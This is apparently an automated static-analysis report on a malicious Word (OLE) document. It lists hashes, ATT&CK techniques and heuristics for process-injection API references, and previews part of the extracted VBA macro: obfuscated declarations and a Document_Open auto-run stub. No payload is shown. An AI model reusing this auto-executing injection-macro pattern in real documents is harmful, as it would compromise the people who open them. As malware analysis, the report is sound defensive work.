Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a4a86172aa599b25…

MALICIOUS

Office (OLE)

35.0 KB Created: 2018-01-18 17:58:00 Authoring application: Microsoft Office Word First seen: 2018-01-23
MD5: fd53f7313a5f95fbda9ecc1be34024d2 SHA-1: b57235934a8be5ec227c64eaa4ad23cc1f1c17c0 SHA-256: a4a86172aa599b254c76918afbb12ac4be30275c6ae6fb0868c9f6d71b1a0835
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro that executes upon opening. The macro references Windows API functions such as CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, indicating an attempt to load and execute a second-stage payload. The presence of Document_Open macro and references to LoadLibrary and GetProcAddress further support this. The exact payload and its destination are not directly discernible from the provided evidence.

Heuristics 9

  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1397 bytes
SHA-256: f3235698e42443cca044e7e14e3a8340a4f0deca1df95811e4aa86316af114f8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Type PROC
    ZEnRYEL As Long
    mhhsUzo As Long
    cACtzcH As Long
    ChnpYwt As Long
End Type

Private Type INFO
    ppFnQhc As Long
    cACtzcH As String
    ZLSaait As String
    iSeyHpq As String
    AhBCTbE As Long
    JCSZRqE As Long
    GvjZtDZ As Long
    DlAXgbr As Long
    MokGgKj As Long
    hbCYiGg As Long
    parRilo As Long
    UXaPWID As Long
    dSYmUJX As Integer
    YWNZiiS As Integer
    vljwxCW As Long
    xChGlfJ As Long
    itwVpab As Long
    qqJmWHg As Long
End Type

#If VBA7 Then
Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
#Else
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
#End If




Sub Document_Open()
    
    Call Eiebv
    
End Sub